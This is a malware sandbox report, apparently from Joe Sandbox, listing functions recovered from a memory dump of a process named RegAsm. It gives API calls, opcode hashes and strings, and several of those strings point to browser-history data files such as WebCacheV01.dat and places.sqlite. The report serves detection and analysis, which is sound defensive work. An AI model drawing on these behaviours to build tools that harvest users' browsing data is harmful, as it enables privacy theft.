                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmpqsort
                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                      Function 00413CA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModuleProcessTimes
                                                                                                                                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 116129598-3385500049
                                                                                                                                                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                      Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                      • API String ID: 2887208581-2114579845
                                                                                                                                                                                                                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                      Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                      Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                      Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                      Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                                                      • String ID: $$8
                                                                                                                                                                                                                      • API String ID: 1475443563-435121686
                                                                                                                                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                      Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1979745280-0
                                                                                                                                                                                                                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                      Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                      • API String ID: 2641622041-467022611
                                                                                                                                                                                                                      • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                      Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 839530781-0
                                                                                                                                                                                                                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                      Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                      • String ID: *.*$index.dat
                                                                                                                                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                      Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                      Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3397143404-0
                                                                                                                                                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                      Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                      Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleSleep
                                                                                                                                                                                                                      • String ID: }A
                                                                                                                                                                                                                      • API String ID: 252777609-2138825249
                                                                                                                                                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                      Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3056473165-0
                                                                                                                                                                                                                      • Opcode ID: 0b948c499b3449ea39a97f62b454048eb940a9f441a9691fc400a1ab51a84e12
                                                                                                                                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b948c499b3449ea39a97f62b454048eb940a9f441a9691fc400a1ab51a84e12
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                      Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: BINARY
                                                                                                                                                                                                                      • API String ID: 2221118986-907554435
                                                                                                                                                                                                                      • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                      Function 00405220 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
